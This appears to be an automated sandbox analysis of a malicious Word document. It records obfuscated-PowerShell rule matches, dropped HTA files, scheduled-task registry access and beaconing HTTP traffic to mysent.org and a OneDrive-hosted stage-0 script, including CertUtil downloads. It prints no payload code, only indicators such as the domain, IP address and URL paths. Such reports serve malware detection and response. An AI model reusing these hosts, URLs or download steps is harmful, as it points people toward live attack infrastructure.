Source: 00000023.00000003.16506433003.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000024.00000000.16508717527.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000024.00000000.16509432349.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000024.00000000.16509719926.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000000.16510560264.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000002.16572994813.00160000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000002.16573202405.004CF000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000002.16573179221.004BF000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000002.16573258362.004E1000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000025.00000002.16573119211.00490000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000024.00000000.16510314431.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: dropped\580A98AB00459B6800754CE6A4E140AE0, type: DROPPED	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y2YPC48Z\access.log[1].txt, type: DROPPED	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta, type: DROPPED	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\580A98AB00459B6800754CE6A4E140AE, type: DROPPED	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R03ZXFR8\access.log[1].txt, type: DROPPED	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta, type: DROPPED	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Show sources

Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Directory queried: number of queries: 1343

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: mysent.org

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.81:49162 -> 188.241.39.220:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.81:49162 -> 188.241.39.220:443

Networking:

HTTP GET or POST without a user agent

Show sources

Source: global traffic

HTTP traffic detected: GET /hpmys.txt HTTP/1.1Host: mysent.org

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 462
Source: global traffic	HTTP traffic detected: POST /modules/default.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 206
Source: global traffic	HTTP traffic detected: GET /modules/default.php HTTP/1.1Cookie: session=GTGEDi6ekpdvoTbGTxmvGYlZl9Y=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
Source: global traffic	HTTP traffic detected: POST /modules/main.php HTTP/1.1User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 94
Source: global traffic	HTTP traffic detected: POST /modules/main.php HTTP/1.1User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 238
Source: global traffic	HTTP traffic detected: GET /modules/default.php HTTP/1.1Cookie: session=A28CY7CTtyMIsdT0xdubajbuXDs=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
Source: global traffic	HTTP traffic detected: POST /modules/default.php HTTP/1.1User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 2830
Source: global traffic	HTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 462
Source: global traffic	HTTP traffic detected: GET /modules/main.php HTTP/1.1Cookie: session=+6QNckPfZ1I1gtw1brM9/Zms3DU=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
Source: global traffic	HTTP traffic detected: POST /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 462
Source: global traffic	HTTP traffic detected: POST /modules/main.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 206

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /access.log.txt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: /User-Agent: Microsoft-CryptoAPI/6.1Host: mysent.org
Source: global traffic	HTTP traffic detected: GET /access.log.txt HTTP/1.1Accept: /User-Agent: CertUtil URL AgentHost: mysent.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content HTTP/1.1User-Agent: Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299)Host: api.onedrive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /y4mLDnW_sdiYZdrKuP_hiNnzpiLk2TKmTpCsB8gTSB6nzLeQ5XI6zgdcTjR3JG3Poj0uB4PFybzxs8PnowL5t489i5OJYPLU1pFu0EfBu2R-TNgGUEBJrDX6xp0txVyQUcI1vVcyu6-6Ytt0A_2SLJjd9KGnvOs0gS38Yc972-fShnY6NOZB_GJMLZNHGwfgo2STbA3YPaoscB3eIa7eLbNlA/STAGE0-PS.txt HTTP/1.1User-Agent: Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299)Host: dgdadq.dm.files.1drv.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /modules/default.php HTTP/1.1Cookie: session=GTGEDi6ekpdvoTbGTxmvGYlZl9Y=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
Source: global traffic	HTTP traffic detected: GET /hpmys.txt HTTP/1.1Host: mysent.org
Source: global traffic	HTTP traffic detected: GET /access.log.txt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: /User-Agent: Microsoft-CryptoAPI/6.1Host: mysent.org
Source: global traffic	HTTP traffic detected: GET /access.log.txt HTTP/1.1Accept: /User-Agent: CertUtil URL AgentHost: mysent.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /modules/default.php HTTP/1.1Cookie: session=A28CY7CTtyMIsdT0xdubajbuXDs=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
